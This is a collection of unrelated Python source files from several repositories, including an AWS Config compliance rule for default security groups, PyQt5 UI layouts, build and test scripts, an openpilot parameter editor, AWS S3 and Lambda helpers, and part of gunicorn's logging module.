metadata (dict) | text (string, lengths 60 to 3.49M)
---|---
{
"source": "1T/aws-config-rules",
"score": 2
} |
#### File: python/VPC_DEFAULT_SECURITY_GROUP_BLOCKED/VPC_DEFAULT_SECURITY_GROUP_BLOCKED.py
```python
import json
import datetime
import boto3
import botocore
AWS_CONFIG_CLIENT = boto3.client('config')
DEFAULT_RESOURCE_TYPE = "AWS::EC2::SecurityGroup"
ASSUME_ROLE_MODE = False
def evaluate_compliance(configuration_item, rule_parameters):
if configuration_item['configuration']['groupName'] != 'default':
return 'NOT_APPLICABLE'
if configuration_item['configuration']['ipPermissions']:
return build_evaluation_from_config_item(
configuration_item,
'NON_COMPLIANT',
annotation="This default Security Group has one or more Ingress rules.")
if configuration_item['configuration']['ipPermissionsEgress']:
return build_evaluation_from_config_item(
configuration_item,
'NON_COMPLIANT',
annotation="This default Security Group has one or more Egress rules.")
return 'COMPLIANT'
# USE AS IS
# Helper function to check if rule parameters exist
def parameters_exist(parameters):
return len(parameters) != 0
# Helper function used to validate input
def check_defined(reference, referenceName):
if not reference:
raise Exception('Error: ', referenceName, 'is not defined')
return reference
# Check whether the message is OversizedConfigurationItemChangeNotification or not
def is_oversized_changed_notification(messageType):
check_defined(messageType, 'messageType')
return messageType == 'OversizedConfigurationItemChangeNotification'
# Check whether the message is a ScheduledNotification or not.
def is_scheduled_notification(messageType):
check_defined(messageType, 'messageType')
return messageType == 'ScheduledNotification'
# Get configurationItem using getResourceConfigHistory API
# in case of OversizedConfigurationItemChangeNotification
def get_configuration(resourceType, resourceId, configurationCaptureTime):
result = AWS_CONFIG_CLIENT.get_resource_config_history(
resourceType=resourceType,
resourceId=resourceId,
laterTime=configurationCaptureTime,
limit=1)
configurationItem = result['configurationItems'][0]
return convert_api_configuration(configurationItem)
# Convert from the API model to the original invocation model
def convert_api_configuration(configurationItem):
for k, v in configurationItem.items():
if isinstance(v, datetime.datetime):
configurationItem[k] = str(v)
configurationItem['awsAccountId'] = configurationItem['accountId']
configurationItem['ARN'] = configurationItem['arn']
configurationItem['configurationStateMd5Hash'] = configurationItem['configurationItemMD5Hash']
configurationItem['configurationItemVersion'] = configurationItem['version']
configurationItem['configuration'] = json.loads(configurationItem['configuration'])
if 'relationships' in configurationItem:
for i in range(len(configurationItem['relationships'])):
configurationItem['relationships'][i]['name'] = configurationItem['relationships'][i]['relationshipName']
return configurationItem
# Based on the type of message get the configuration item
# either from configurationItem in the invoking event
# or using the getResourceConfigHistory API in the get_configuration function.
def get_configuration_item(invokingEvent):
check_defined(invokingEvent, 'invokingEvent')
if is_oversized_changed_notification(invokingEvent['messageType']):
configurationItemSummary = check_defined(invokingEvent['configurationItemSummary'], 'configurationItemSummary')
return get_configuration(configurationItemSummary['resourceType'], configurationItemSummary['resourceId'],
configurationItemSummary['configurationItemCaptureTime'])
elif is_scheduled_notification(invokingEvent['messageType']):
return None
return check_defined(invokingEvent['configurationItem'], 'configurationItem')
# Check whether the resource has been deleted. If it has, then the evaluation is unnecessary.
def is_applicable(configurationItem, event):
check_defined(configurationItem, 'configurationItem')
check_defined(event, 'event')
status = configurationItem['configurationItemStatus']
eventLeftScope = event['eventLeftScope']
if status == 'ResourceDeleted':
print("Resource Deleted, setting Compliance Status to NOT_APPLICABLE.")
return (status == 'OK' or status == 'ResourceDiscovered') and not eventLeftScope
# This gets the client after assuming the Config service role
# either in the same AWS account or cross-account.
def get_client(service, event=None):
if not event:
return boto3.client(service)
credentials = get_assume_role_credentials(event["executionRoleArn"])
return boto3.client(service, aws_access_key_id=credentials['AccessKeyId'],
aws_secret_access_key=credentials['SecretAccessKey'],
aws_session_token=credentials['SessionToken']
)
def get_assume_role_credentials(role_arn):
sts_client = boto3.client('sts')
try:
assume_role_response = sts_client.assume_role(RoleArn=role_arn, RoleSessionName="configLambdaExecution")
return assume_role_response['Credentials']
except botocore.exceptions.ClientError as ex:
# Scrub error message for any internal account info leaks
if 'AccessDenied' in ex.response['Error']['Code']:
ex.response['Error']['Message'] = "AWS Config does not have permission to assume the IAM role."
else:
ex.response['Error']['Message'] = "InternalError"
ex.response['Error']['Code'] = "InternalError"
raise ex
# This generates an evaluation for AWS Config
def build_evaluation(resource_id, compliance_type, timestamp, resource_type=DEFAULT_RESOURCE_TYPE, annotation=None):
eval = {}
if annotation:
eval['Annotation'] = annotation
eval['ComplianceResourceType'] = resource_type
eval['ComplianceResourceId'] = resource_id
eval['ComplianceType'] = compliance_type
eval['OrderingTimestamp'] = timestamp
return eval
def build_evaluation_from_config_item(configuration_item, compliance_type, annotation=None):
eval_ci = {}
if annotation:
eval_ci['Annotation'] = annotation
eval_ci['ComplianceResourceType'] = configuration_item['resourceType']
eval_ci['ComplianceResourceId'] = configuration_item['resourceId']
eval_ci['ComplianceType'] = compliance_type
eval_ci['OrderingTimestamp'] = configuration_item['configurationItemCaptureTime']
return eval_ci
# This decorates the lambda_handler in rule_code with the actual PutEvaluation call
def lambda_handler(event, context):
global AWS_CONFIG_CLIENT
if ASSUME_ROLE_MODE:
AWS_CONFIG_CLIENT = get_client('config', event)
evaluations = []
# print(event)
check_defined(event, 'event')
invokingEvent = json.loads(event['invokingEvent'])
rule_parameters = {}
if 'ruleParameters' in event:
rule_parameters = json.loads(event['ruleParameters'])
configuration_item = get_configuration_item(invokingEvent)
if is_applicable(configuration_item, event):
compliance_result = evaluate_compliance(configuration_item, rule_parameters)
else:
compliance_result = "NOT_APPLICABLE"
if isinstance(compliance_result, str):
evaluations.append(build_evaluation_from_config_item(configuration_item, compliance_result))
elif isinstance(compliance_result, list):
for evaluation in compliance_result:
missing_fields = False
for field in ('ComplianceResourceType', 'ComplianceResourceId', 'ComplianceType', 'OrderingTimestamp'):
if field not in evaluation:
print("Missing " + field + " from custom evaluation.")
missing_fields = True
if not missing_fields:
evaluations.append(evaluation)
elif isinstance(compliance_result, dict):
missing_fields = False
for field in ('ComplianceResourceType', 'ComplianceResourceId', 'ComplianceType', 'OrderingTimestamp'):
if field not in compliance_result:
print("Missing " + field + " from custom evaluation.")
missing_fields = True
if not missing_fields:
evaluations.append(compliance_result)
else:
evaluations.append(build_evaluation_from_config_item(configuration_item, 'NOT_APPLICABLE'))
# Put together the request that reports the evaluation status
resultToken = event['resultToken']
testMode = False
if resultToken == 'TEST<PASSWORD>':
# Used solely for RDK test to skip actual put_evaluation API call
testMode = True
# Invoke the Config API to report the result of the evaluation
AWS_CONFIG_CLIENT.put_evaluations(Evaluations=evaluations, ResultToken=resultToken, TestMode=testMode)
# Used solely for RDK test to be able to test Lambda function
return evaluations
``` |
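A minimal local smoke test for the rule above could look like the sketch below. It is an assumption rather than part of the repository: the module name, the stubbed Config client, and every event value are invented, and importing the rule file still needs an AWS region configured (for example via `AWS_DEFAULT_REGION`) because `boto3.client('config')` runs at import time.
```python
# Hypothetical smoke test (not in the repo). It swaps the module-level Config client
# for a stub so no put_evaluations call reaches AWS; field names follow the standard
# AWS Config invoking-event shape, but the values are made up.
import json
import VPC_DEFAULT_SECURITY_GROUP_BLOCKED as rule  # assumed module name

class StubConfigClient:
    def put_evaluations(self, Evaluations, ResultToken, TestMode):
        print("put_evaluations:", Evaluations, "TestMode:", TestMode)

rule.AWS_CONFIG_CLIENT = StubConfigClient()
invoking_event = {
    "messageType": "ConfigurationItemChangeNotification",
    "configurationItem": {
        "resourceType": "AWS::EC2::SecurityGroup",
        "resourceId": "sg-0123456789abcdef0",
        "configurationItemCaptureTime": "2020-01-01T00:00:00.000Z",
        "configurationItemStatus": "OK",
        "configuration": {
            "groupName": "default",
            "ipPermissions": [],
            "ipPermissionsEgress": [],
        },
    },
}
event = {
    "invokingEvent": json.dumps(invoking_event),
    "resultToken": "no-token",
    "eventLeftScope": False,
}
print(rule.lambda_handler(event, None))  # expect a single COMPLIANT evaluation
```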
{
"source": "1TaylanOzturk/whatsapp-message-scheduler",
"score": 3
} |
#### File: src/UIs/design_of_configuration_window.py
```python
from PyQt5 import QtCore, QtWidgets
class UI(object):
def setupUi(self, GUI):
GUI.setObjectName("GUI")
GUI.setEnabled(True)
GUI.resize(497, 447)
GUI.setAutoFillBackground(False)
self.phoneNumber = QtWidgets.QLineEdit(GUI)
self.phoneNumber.setGeometry(QtCore.QRect(90, 60, 341, 28))
self.phoneNumber.setObjectName("phoneNumber")
self.message = QtWidgets.QPlainTextEdit(GUI)
self.message.setGeometry(QtCore.QRect(90, 100, 341, 60))
self.message.setObjectName("message")
self.label = QtWidgets.QLabel(GUI)
self.label.setGeometry(QtCore.QRect(210, 30, 100, 16))
self.label.setStyleSheet("QLabel {\n"
" font-size: 20px;\n"
"}")
self.label.setObjectName("label")
self.hour = QtWidgets.QLineEdit(GUI)
self.hour.setGeometry(QtCore.QRect(90, 240, 341, 28))
self.hour.setObjectName("hour")
self.label_2 = QtWidgets.QLabel(GUI)
self.label_2.setGeometry(QtCore.QRect(180, 210, 200, 25))
self.label_2.setStyleSheet("QLabel {\n"
" font-size: 20px;\n"
"}")
self.label_2.setObjectName("label_2")
self.minute = QtWidgets.QLineEdit(GUI)
self.minute.setGeometry(QtCore.QRect(90, 280, 341, 28))
self.minute.setObjectName("minute")
self.btn_save = QtWidgets.QPushButton(GUI)
self.btn_save.setGeometry(QtCore.QRect(70, 380, 131, 28))
self.btn_save.setObjectName("btn_save")
self.btn_edit = QtWidgets.QPushButton(GUI)
self.btn_edit.setGeometry(QtCore.QRect(300, 380, 131, 28))
self.btn_edit.setObjectName("btn_edit")
self.retranslateUi(GUI)
QtCore.QMetaObject.connectSlotsByName(GUI)
def retranslateUi(self, GUI):
_translate = QtCore.QCoreApplication.translate
GUI.setWindowTitle(_translate("GUI", "GUI"))
self.phoneNumber.setPlaceholderText(_translate("GUI", " Phone Number"))
self.message.setPlaceholderText(_translate("GUI", " Message"))
self.label.setText(_translate("GUI", "User Datas"))
self.minute.setPlaceholderText(_translate("GUI", " Minute"))
self.label_2.setText(_translate("GUI", "Scheduling Datas"))
self.hour.setPlaceholderText(_translate("GUI", " Hour"))
self.btn_save.setText(_translate("GUI", "Save"))
self.btn_edit.setText(_translate("GUI", "Edit"))
```
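These generated-style UI classes are normally applied to a plain widget at runtime. A minimal usage sketch, assuming the import path below and that PyQt5 is installed:
```python
# Hypothetical usage (not part of the repository): the pyuic-style pattern of
# instantiating the UI class and calling setupUi() on a bare QWidget.
import sys
from PyQt5 import QtWidgets
from UIs.design_of_configuration_window import UI  # assumed import path

if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QWidget()
    ui = UI()
    ui.setupUi(window)
    window.show()
    sys.exit(app.exec_())
```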
#### File: src/UIs/design_of_editing_window.py
```python
from PyQt5 import QtCore, QtWidgets
class UI(object):
def setupUi(self, GUI):
GUI.setObjectName("GUI")
GUI.resize(400, 432)
self.plainTextEdit = QtWidgets.QPlainTextEdit(GUI)
self.plainTextEdit.setGeometry(QtCore.QRect(0, 10, 401, 291))
self.plainTextEdit.setObjectName("plainTextEdit")
self.btn_save = QtWidgets.QPushButton(GUI)
self.btn_save.setGeometry(QtCore.QRect(150, 340, 90, 28))
self.btn_save.setObjectName("btn_save")
self.btn_reset = QtWidgets.QPushButton(GUI)
self.btn_reset.setGeometry(QtCore.QRect(150, 380, 90, 28))
self.retranslateUi(GUI)
QtCore.QMetaObject.connectSlotsByName(GUI)
def retranslateUi(self, GUI):
_translate = QtCore.QCoreApplication.translate
GUI.setWindowTitle(_translate("GUI", "GUI"))
self.btn_save.setText(_translate("GUI", "Save"))
self.btn_reset.setText(_translate("GUI", "Reset"))
``` |
{
"source": "1technophile/platform-espressif32",
"score": 2
} |
#### File: builder/frameworks/_embed_files.py
```python
import shutil
from os import SEEK_CUR, SEEK_END, makedirs
from os.path import basename, isfile, isdir, join
from SCons.Script import Builder
from platformio.util import cd
Import("env")
#
# Embedded files helpers
#
def prepare_files(files):
if not files:
return
fixed_files = []
build_dir = env.subst("$BUILD_DIR")
if not isdir(build_dir):
makedirs(build_dir)
for f in files:
fixed_file = join(build_dir, basename(f))
shutil.copy(env.subst(f), fixed_file)
with open(fixed_file, "rb+") as fp:
fp.seek(-1, SEEK_END)
if fp.read(1) != b'\0':  # compare bytes with bytes; the file is opened in binary mode
fp.seek(0, SEEK_CUR)
fp.write(b'\0')
fixed_files.append(fixed_file)
return fixed_files
def extract_files(cppdefines, files_type):
for define in cppdefines:
if files_type not in define:
continue
if not isinstance(define, tuple):
print("Warning! %s macro cannot be empty!" % files_type)
return []
with cd(env.subst("$PROJECT_DIR")):
value = define[1]
if not isinstance(value, str):
print("Warning! %s macro must contain "
"a list of files separated by ':'" % files_type)
return []
result = []
for f in value.split(':'):
if not isfile(f):
print("Warning! Could not find file %s" % f)
continue
result.append(join("$PROJECT_DIR", f))
return result
def remove_config_define(cppdefines, files_type):
for define in cppdefines:
if files_type in define:
env.ProcessUnFlags("-D%s" % "=".join(str(d) for d in define))
return
def embed_files(files):
for f in files:
filename = basename(f) + ".txt.o"
file_target = env.TxtToBin(join("$BUILD_DIR", filename), f)
env.Depends("$PIOMAINPROG", file_target)
env.Append(PIOBUILDFILES=[env.File(join("$BUILD_DIR", filename))])
env.Append(
BUILDERS=dict(
TxtToBin=Builder(
action=env.VerboseAction(" ".join([
"xtensa-esp32-elf-objcopy",
"--input-target", "binary",
"--output-target", "elf32-xtensa-le",
"--binary-architecture", "xtensa",
"--rename-section", ".data=.rodata.embedded",
"$SOURCE", "$TARGET"
]), "Converting $TARGET"),
suffix=".txt.o"))
)
flags = env.get("CPPDEFINES")
for component_files in ("COMPONENT_EMBED_TXTFILES", "COMPONENT_EMBED_FILES"):
if component_files not in env.Flatten(flags):
continue
files = extract_files(flags, component_files)
if component_files == "COMPONENT_EMBED_TXTFILES":
files = prepare_files(files)
embed_files(files)
remove_config_define(flags, component_files)
``` |
{
"source": "1tgr/rust-os",
"score": 2
} |
#### File: rust-os/src/test.py
```python
import os
import pexpect
import sys
import subprocess
import tempfile
from argparse import ArgumentParser, REMAINDER
from pexpect import fdpexpect
from subprocess import Popen
from vncdotool import api
def main():
parser = ArgumentParser()
parser.add_argument('--screenshot', action='store_true', default=False)
parser.add_argument('qemu_cmd', nargs=REMAINDER)
args = parser.parse_args()
fifo_name = os.path.join(tempfile.mkdtemp(), 'fifo')
os.mkfifo(fifo_name)
try:
child_args = args.qemu_cmd + ['-serial', 'pipe:' + fifo_name, '-vnc', ':0']
print('> %s' % subprocess.list2cmdline(child_args))
with Popen(child_args) as child_proc:
print('[test.py] Started process %d' % child_proc.pid)
try:
with open(fifo_name, 'rb') as fifo:
child = fdpexpect.fdspawn(fifo, encoding='utf8', logfile=sys.stdout, timeout=10)
result = child.expect([r'\[kernel\] end kmain|System ready', r'\[kernel::unwind\] (.*)', pexpect.TIMEOUT])
if result == 0:
print('[test.py] Success')
elif result == 1:
(message,) = child.match.groups()
print('[test.py] Failed: %s' % message)
elif result == 2:
print('[test.py] Timed out')
finally:
if args.screenshot:
client = api.connect('localhost:0', password=None)
filename = 'screenshot.png'
print('[test.py] Saving screenshot to %s' % filename)
prev_screenshot_bytes = None
if result == 0:
try:
with open(filename, 'rb') as f:
prev_screenshot_bytes = f.read()
except:
pass
client.captureScreen(filename)
if prev_screenshot_bytes is not None:
with open(filename, 'rb') as f:
screenshot_bytes = f.read()
if prev_screenshot_bytes != screenshot_bytes:
result = 3
print('[test.py] Stopping process %d' % child_proc.pid)
child_proc.kill()
print('[test.py] Waiting for process %d to exit... ' % child_proc.pid, end='', flush=True)
child_proc.wait()
print('done')
finally:
os.unlink(fifo_name)
return result
if __name__ == '__main__':
result = main()
exit(result)
``` |
{
"source": "1Thamer/openpilot0.6.6",
"score": 3
} |
#### File: 1Thamer/openpilot0.6.6/op_edit.py
```python
from common.op_params import opParams
import time
import ast
class opEdit: # use by running `python /data/openpilot/op_edit.py`
def __init__(self):
self.op_params = opParams()
self.params = None
print('Welcome to the opParams command line editor!')
print('Here are your parameters:\n')
self.run_loop()
def run_loop(self):
print('Welcome to the opParams command line editor!')
print('Here are your parameters:\n')
while True:
self.params = self.op_params.get()
values_list = [self.params[i] if len(str(self.params[i])) < 20 else '{} ... {}'.format(str(self.params[i])[:30], str(self.params[i])[-15:]) for i in self.params]
to_print = ['{}. {}: {} (type: {})'.format(idx + 1, i, values_list[idx], str(type(self.params[i])).split("'")[1]) for idx, i in enumerate(self.params)]
to_print.append('{}. Add new parameter!'.format(len(self.params) + 1))
to_print.append('{}. Delete parameter!'.format(len(self.params) + 2))
print('\n'.join(to_print))
print('\nChoose a parameter to explore (by integer index): ')
choice = input('>> ')
parsed, choice = self.parse_choice(choice)
if parsed == 'continue':
continue
elif parsed == 'add':
if self.add_parameter() == 'error':
return
elif parsed == 'change':
if self.change_parameter(choice) == 'error':
return
elif parsed == 'delete':
if self.delete_parameter() == 'error':
return
else:
return
def parse_choice(self, choice):
if choice.isdigit():
choice = int(choice)
else:
print('Not an integer, exiting!')
return 'error', choice
if choice not in range(1, len(self.params) + 3): # three for add/delete parameter
print('Not in range!\n', flush=True)
time.sleep(1.5)
return 'continue', choice
if choice == len(self.params) + 1: # add new parameter
return 'add', choice
if choice == len(self.params) + 2: # delete parameter
return 'delete', choice
return 'change', choice
def change_parameter(self, choice):
chosen_key = list(self.params)[choice - 1]
extra_info = False
if chosen_key in self.op_params.default_params:
extra_info = True
param_allowed_types = self.op_params.default_params[chosen_key]['allowed_types']
param_description = self.op_params.default_params[chosen_key]['description']
old_value = self.params[chosen_key]
print('Chosen parameter: {}'.format(chosen_key))
print('Current value: {} (type: {})'.format(old_value, str(type(old_value)).split("'")[1]))
if extra_info:
print('\nDescription: {}'.format(param_description))
print('Allowed types: {}\n'.format(', '.join([str(i).split("'")[1] for i in param_allowed_types])))
print('Enter your new value:')
new_value = input('>> ')
if len(new_value) == 0:
print('Entered value cannot be empty!')
return 'error'
status, new_value = self.parse_input(new_value)
if not status:
print('Cannot parse input, exiting!')
return 'error'
if extra_info and not any([isinstance(new_value, typ) for typ in param_allowed_types]):
print('The type of data you entered ({}) is not allowed with this parameter!\n'.format(str(type(new_value)).split("'")[1]))
time.sleep(1.5)
return
print('\nOld value: {} (type: {})'.format(old_value, str(type(old_value)).split("'")[1]))
print('New value: {} (type: {})'.format(new_value, str(type(new_value)).split("'")[1]))
print('Do you want to save this?')
choice = input('[Y/n]: ').lower()
if choice == 'y':
self.op_params.put(chosen_key, new_value)
print('\nSaved! Anything else?')
choice = input('[Y/n]: ').lower()
if choice == 'n':
return
else:
print('\nNot saved!\n', flush=True)
time.sleep(1.5)
def parse_input(self, dat):
try:
dat = ast.literal_eval(dat)
except:
try:
dat = ast.literal_eval('"{}"'.format(dat))
except ValueError:
return False, dat
return True, dat
def delete_parameter(self):
print('Enter the name of the parameter to delete:')
key = input('>> ')
status, key = self.parse_input(key)
if not status:
print('Cannot parse input, exiting!')
return 'error'
if not isinstance(key, str):
print('Input must be a string!')
return 'error'
if key not in self.params:
print("Parameter doesn't exist!")
return 'error'
value = self.params.get(key)
print('Parameter name: {}'.format(key))
print('Parameter value: {} (type: {})'.format(value, str(type(value)).split("'")[1]))
print('Do you want to delete this?')
choice = input('[Y/n]: ').lower()
if choice == 'y':
self.op_params.delete(key)
print('\nDeleted! Anything else?')
choice = input('[Y/n]: ').lower()
if choice == 'n':
return
else:
print('\nNot saved!\n', flush=True)
time.sleep(1.5)
def add_parameter(self):
print('Type the name of your new parameter:')
key = input('>> ')
if len(key) == 0:
print('Entered key cannot be empty!')
return 'error'
status, key = self.parse_input(key)
if not status:
print('Cannot parse input, exiting!')
return 'error'
if not isinstance(key, str):
print('Input must be a string!')
return 'error'
print("Enter the data you'd like to save with this parameter:")
value = input('>> ')
status, value = self.parse_input(value)
if not status:
print('Cannot parse input, exiting!')
return 'error'
print('Parameter name: {}'.format(key))
print('Parameter value: {} (type: {})'.format(value, str(type(value)).split("'")[1]))
print('Do you want to save this?')
choice = input('[Y/n]: ').lower()
if choice == 'y':
self.op_params.put(key, value)
print('\nSaved! Anything else?')
choice = input('[Y/n]: ').lower()
if choice == 'n':
return
else:
print('\nNot saved!\n', flush=True)
time.sleep(1.5)
opEdit()
``` |
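The double `ast.literal_eval` call in `parse_input` is what lets the editor accept both typed Python literals and bare words. A small illustration of that fallback, not taken from the repository:
```python
# Illustration only: literal_eval parses real Python literals, and the quoted retry
# is what turns a bare word like `hello` into the string 'hello' instead of an error.
import ast

print(ast.literal_eval("1.5"))        # 1.5 (float)
print(ast.literal_eval("[1, 2, 3]"))  # [1, 2, 3] (list)
try:
    ast.literal_eval("hello")         # bare word: not a valid literal
except ValueError:
    print(ast.literal_eval('"{}"'.format("hello")))  # falls back to the string 'hello'
```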
{
"source": "1T/InventoryCalculator",
"score": 2
} |
#### File: core/storages/s3_storage.py
```python
import boto3
from botocore.exceptions import ClientError
from inventorycalculator.errors import S3StorageError
from OneTicketLogging import elasticsearch_logger
_logger = elasticsearch_logger(__name__)
class S3Storage:
def __init__(self, bucket_name: str):
self._bucket_name = bucket_name
self._client = boto3.client('s3')
def upload(self, key: str, data: str):
try:
self._client.put_object(
Body=data.encode(),
Key=key,
Bucket=self._bucket_name
)
except ClientError as e:
_logger.error(e)
raise S3StorageError('Unable to upload given data')
def get(self, key: str) -> str:
try:
return self._client.get_object(
Key=key,
Bucket=self._bucket_name
)['Body'].read().decode('utf-8')
except ClientError as e:
_logger.error(e)
raise S3StorageError(f'Resource not exists by given key:{key}')
```
#### File: core/workers/aws_lambda.py
```python
import boto3
from json import dumps
from typing import Dict
from botocore.exceptions import ClientError
from inventorycalculator.errors import InvokeLambdaError
from OneTicketLogging import elasticsearch_logger
_logger = elasticsearch_logger(__name__)
class AwsLambda:
def __init__(self, name: str, **kwargs):
self._name = name
self._client = boto3.client('lambda')
self._invocation_type = kwargs.get('InvocationType', 'Event')
def async_invoke(self, payload: Dict):
try:
self._client.invoke(
FunctionName=self._name,
Payload=dumps(payload),
InvocationType=self._invocation_type
)
except ClientError as exc:
_logger.error(exc)
raise InvokeLambdaError(f'{self._name} invocation failed: {exc}')
``` |
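A usage sketch for the two wrappers above; the bucket and function names are placeholders, and both classes assume AWS credentials and a region are available in the environment.
```python
# Hypothetical usage (names invented). S3Storage round-trips a small JSON document;
# AwsLambda fires an asynchronous ("Event") invocation with a JSON payload.
storage = S3Storage('inventory-calculator-artifacts')
storage.upload('reports/2020-01-01.json', '{"total_inventory": 42}')
print(storage.get('reports/2020-01-01.json'))

worker = AwsLambda('inventory-calculator-worker')  # InvocationType defaults to 'Event'
worker.async_invoke({'job_id': 'abc-123'})
```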
{
"source": "1T/python-filterparams",
"score": 3
} |
#### File: src/filterparams/util.py
```python
import itertools
from werkzeug.datastructures import MultiDict
def to_multidict(value):
if not isinstance(value, MultiDict) and isinstance(value, dict):
value = _dict_to_multidict(value)
return value
def flatten(to_flatten_list):
if not isinstance(to_flatten_list, (list, tuple)):
return to_flatten_list
result = []
for list_item in to_flatten_list:
if isinstance(list_item, (list, tuple)):
result.extend(flatten(item) for item in list_item)
else:
result.append(list_item)
return result
def create_key_value_pairs(dictionary, key):
def get_values(key):
if hasattr(dictionary, 'getall'):
data = dictionary.getall(key)
else:
data = [dictionary.get(key)]
return flatten(data)
values = get_values(key)
return zip([key] * len(values), values)
def _dict_to_multidict(value):
return MultiDict(
itertools.chain.from_iterable(
create_key_value_pairs(value, key)
for key in value.keys()
)
)
```
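A short illustration of what `to_multidict` does with a plain dict whose values include lists, assuming Werkzeug is installed and the module is importable as `filterparams.util`:
```python
# Not part of the package: list values are flattened into repeated keys on the MultiDict.
from filterparams.util import to_multidict  # assumed import path

md = to_multidict({'name': ['alice', 'bob'], 'age': 30})
print(md.getlist('name'))  # ['alice', 'bob']
print(md.get('age'))       # 30
```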
#### File: test/filterparams_tests/base_parser_test.py
```python
from unittest import TestCase
class BaseParserTest(TestCase):
def setUp(self):
self.params = {}
def _add_param(self, name, **kwargs):
items = [name]
if 'filter' in kwargs:
items.append(kwargs['filter'])
if 'alias' in kwargs:
items.append(kwargs['alias'])
key = 'filter[param]%s' % (
''.join('[%s]' % item for item in items)
)
self.params[key] = kwargs.get('value', None)
def _add_binding(self, binding):
self.params['filter[binding]'] = binding
```
#### File: test/filterparams_tests/test_safe_parser.py
```python
from filterparams import build_parser
from filterparams_tests.base_parser_test import (
BaseParserTest
)
class TestSafeParser(BaseParserTest):
def setUp(self):
self.filters = []
self.default_filter = None
super(TestSafeParser, self).setUp()
@property
def parser(self):
return build_parser(
self.filters,
self.default_filter
)
@property
def query(self):
return self.parser(self.params)
def test_filter_not_present(self):
self._add_param('test', filter='eq')
with self.assertRaises(ValueError):
self.query # pylint: disable=pointless-statement
def test_filter_present(self):
self.filters.append('eq')
self._add_param('test', filter='eq')
self.assertTrue(self.query.has_param('test'))
def test_default_filter(self):
self.filters.append('eq')
self.default_filter = 'eq'
self._add_param('test')
param = self.query.get_param('test')
self.assertEqual(param.filter, 'eq')
``` |
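Pieced together only from the tests above, so treat it as a sketch rather than an authoritative description of the package API: building a parser that accepts an `eq` filter and querying a parameter might look like this.
```python
# Sketch reconstructed from the tests; the key layout follows the
# filter[param][name][filter] convention used by _add_param, with made-up values.
from filterparams import build_parser

parser = build_parser(['eq'], 'eq')                 # allowed filters, default filter
query = parser({'filter[param][name][eq]': 'alice'})
print(query.has_param('name'))                      # True
print(query.get_param('name').filter)               # 'eq'
```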
{
"source": "1tracy/3.3.1.1-flask-blog",
"score": 2
} |
#### File: site-packages/gunicorn/glogging.py
```python
import base64
import binascii
import time
import logging
logging.Logger.manager.emittedNoHandlerWarning = 1
from logging.config import dictConfig
from logging.config import fileConfig
import os
import socket
import sys
import threading
import traceback
from gunicorn import util
# syslog facility codes
SYSLOG_FACILITIES = {
"auth": 4,
"authpriv": 10,
"cron": 9,
"daemon": 3,
"ftp": 11,
"kern": 0,
"lpr": 6,
"mail": 2,
"news": 7,
"security": 4, # DEPRECATED
"syslog": 5,
"user": 1,
"uucp": 8,
"local0": 16,
"local1": 17,
"local2": 18,
"local3": 19,
"local4": 20,
"local5": 21,
"local6": 22,
"local7": 23,
}
CONFIG_DEFAULTS = dict(
version=1,
disable_existing_loggers=False,
root={"level": "INFO", "handlers": ["console"]},
loggers={
"gunicorn.error": {
"level": "INFO",
"handlers": ["error_console"],
"propagate": True,
"qualname": "gunicorn.error",
},
"gunicorn.access": {
"level": "INFO",
"handlers": ["console"],
"propagate": True,
"qualname": "gunicorn.access",
},
},
handlers={
"console": {
"class": "logging.StreamHandler",
"formatter": "generic",
"stream": "ext://sys.stdout",
},
"error_console": {
"class": "logging.StreamHandler",
"formatter": "generic",
"stream": "ext://sys.stderr",
},
},
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter",
}
},
)
def loggers():
"""get list of all loggers"""
root = logging.root
existing = root.manager.loggerDict.keys()
return [logging.getLogger(name) for name in existing]
class SafeAtoms(dict):
def __init__(self, atoms):
dict.__init__(self)
for key, value in atoms.items():
if isinstance(value, str):
self[key] = value.replace('"', '\\"')
else:
self[key] = value
def __getitem__(self, k):
if k.startswith("{"):
kl = k.lower()
if kl in self:
return super().__getitem__(kl)
else:
return "-"
if k in self:
return super().__getitem__(k)
else:
return "-"
def parse_syslog_address(addr):
# unix domain socket type depends on backend
# SysLogHandler will try both when given None
if addr.startswith("unix://"):
sock_type = None
# set socket type only if explicitly requested
parts = addr.split("#", 1)
if len(parts) == 2:
addr = parts[0]
if parts[1] == "dgram":
sock_type = socket.SOCK_DGRAM
return (sock_type, addr.split("unix://")[1])
if addr.startswith("udp://"):
addr = addr.split("udp://")[1]
socktype = socket.SOCK_DGRAM
elif addr.startswith("tcp://"):
addr = addr.split("tcp://")[1]
socktype = socket.SOCK_STREAM
else:
raise RuntimeError("invalid syslog address")
if "[" in addr and "]" in addr:
host = addr.split("]")[0][1:].lower()
elif ":" in addr:
host = addr.split(":")[0].lower()
elif addr == "":
host = "localhost"
else:
host = addr.lower()
addr = addr.split("]")[-1]
if ":" in addr:
port = addr.split(":", 1)[1]
if not port.isdigit():
raise RuntimeError("%r is not a valid port number." % port)
port = int(port)
else:
port = 514
return (socktype, (host, port))
class Logger(object):
LOG_LEVELS = {
"critical": logging.CRITICAL,
"error": logging.ERROR,
"warning": logging.WARNING,
"info": logging.INFO,
"debug": logging.DEBUG,
}
loglevel = logging.INFO
error_fmt = r"%(asctime)s [%(process)d] [%(levelname)s] %(message)s"
datefmt = r"[%Y-%m-%d %H:%M:%S %z]"
access_fmt = "%(message)s"
syslog_fmt = "[%(process)d] %(message)s"
atoms_wrapper_class = SafeAtoms
def __init__(self, cfg):
self.error_log = logging.getLogger("gunicorn.error")
self.error_log.propagate = False
self.access_log = logging.getLogger("gunicorn.access")
self.access_log.propagate = False
self.error_handlers = []
self.access_handlers = []
self.logfile = None
self.lock = threading.Lock()
self.cfg = cfg
self.setup(cfg)
def setup(self, cfg):
self.loglevel = self.LOG_LEVELS.get(cfg.loglevel.lower(), logging.INFO)
self.error_log.setLevel(self.loglevel)
self.access_log.setLevel(logging.INFO)
# set gunicorn.error handler
if self.cfg.capture_output and cfg.errorlog != "-":
for stream in sys.stdout, sys.stderr:
stream.flush()
self.logfile = open(cfg.errorlog, "a+")
os.dup2(self.logfile.fileno(), sys.stdout.fileno())
os.dup2(self.logfile.fileno(), sys.stderr.fileno())
self._set_handler(
self.error_log,
cfg.errorlog,
logging.Formatter(self.error_fmt, self.datefmt),
)
# set gunicorn.access handler
if cfg.accesslog is not None:
self._set_handler(
self.access_log,
cfg.accesslog,
fmt=logging.Formatter(self.access_fmt),
stream=sys.stdout,
)
# set syslog handler
